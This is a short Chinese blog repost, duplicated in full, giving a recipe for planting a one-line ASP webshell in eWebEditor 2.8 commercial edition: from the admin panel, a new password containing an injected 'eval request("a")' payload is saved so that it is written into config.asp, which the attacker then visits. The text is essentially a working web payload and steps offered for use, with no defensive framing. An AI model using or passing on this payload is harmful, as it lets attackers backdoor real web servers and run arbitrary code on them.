ewebeditor 2.8 后台插马
ewebeditor 2.8 后台插上一句话
影响版本:2.8 商业版
攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’
设置成功后,访问http://www.xxx.com/ewebeditor/asp/config.asp文件即可,
一句话木马被写入到这个文件里面了.
本文转载自『半坑土农民's Blog』
ewebeditor 2.8 后台插上一句话
影响版本:2.8 商业版
攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’
设置成功后,访问http://www.xxx.com/ewebeditor/asp/config.asp文件即可,
一句话木马被写入到这个文件里面了.
本文转载自『半坑土农民's Blog』